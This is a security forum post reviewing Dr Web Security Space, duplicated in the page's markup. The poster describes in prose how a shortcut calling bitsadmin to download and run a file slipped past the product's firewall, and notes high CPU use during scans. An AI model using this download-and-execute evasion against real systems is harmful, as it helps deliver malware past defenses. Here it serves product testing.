Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Software
Security Apps
Other security for Windows, Mac, Linux
Will there be a Dr Web Security Space 12?
Message
<blockquote data-quote="509322" data-source="post: 763159"><p>I was able to bypass the Dr Web firewall using a shortcut that calls BItsadmin to download a file and then execute it. The firewall does not pick-up bitsadmin because in Windows it appears that it is SYSTEM (pid 4) is doing the actual download. I used Winja as the download test file. Now Winja doesn't do anything that is going to provoke Dr Web even when the Prevention (Katana module) is set to Paranoid.. The point of the test was to see if I could bypass the firewall only - instead of also bypassing Dr Web's behavior analysis (prevention) by installing Winja.</p><p></p><p>If I set the Dr Web firewall to Ask User for all programs, then I get a firewall alert for SYSTEM when bitsadmin attempts to download the file. A typical user isn't going to get what is happening.</p><p></p><p>In short, Dr Web isn't detecting basic malicious shortcut files. However, all is not lost. Don't get too bent out of shape.</p><p></p><p>If I do the same test using Process Hacker, then Dr Web doesn't block the download, but it does detect and removes the Process Hacker install. Process Hacker is detected as a threat. Why ? Because it installs a driver that can be exploited and used as a hack tool. So may AVs detect it. It is good and safe to use for testing.</p><p></p><p>The scan engine will use high % during a CPU scan. However, that isn't much of a fret as one shouldn't be scanning their entire system all the time.</p><p></p><p>However, disinfection\removal uses high CPU temporarily. I can see people complaining about that.</p><p></p><p>Overall it is decent. It isn't perfect, but it is decent. From what I am seeing, it is quite likeable.</p><p></p><p>It's like most security programs... the user isn't going to know what to expect unless they practice with it. And most importantly, practice with malware.</p></blockquote><p></p>
[QUOTE="509322, post: 763159"] I was able to bypass the Dr Web firewall using a shortcut that calls BItsadmin to download a file and then execute it. The firewall does not pick-up bitsadmin because in Windows it appears that it is SYSTEM (pid 4) is doing the actual download. I used Winja as the download test file. Now Winja doesn't do anything that is going to provoke Dr Web even when the Prevention (Katana module) is set to Paranoid.. The point of the test was to see if I could bypass the firewall only - instead of also bypassing Dr Web's behavior analysis (prevention) by installing Winja. If I set the Dr Web firewall to Ask User for all programs, then I get a firewall alert for SYSTEM when bitsadmin attempts to download the file. A typical user isn't going to get what is happening. In short, Dr Web isn't detecting basic malicious shortcut files. However, all is not lost. Don't get too bent out of shape. If I do the same test using Process Hacker, then Dr Web doesn't block the download, but it does detect and removes the Process Hacker install. Process Hacker is detected as a threat. Why ? Because it installs a driver that can be exploited and used as a hack tool. So may AVs detect it. It is good and safe to use for testing. The scan engine will use high % during a CPU scan. However, that isn't much of a fret as one shouldn't be scanning their entire system all the time. However, disinfection\removal uses high CPU temporarily. I can see people complaining about that. Overall it is decent. It isn't perfect, but it is decent. From what I am seeing, it is quite likeable. It's like most security programs... the user isn't going to know what to expect unless they practice with it. And most importantly, practice with malware. [/QUOTE]
Insert quotes…
Verification
Post reply
Top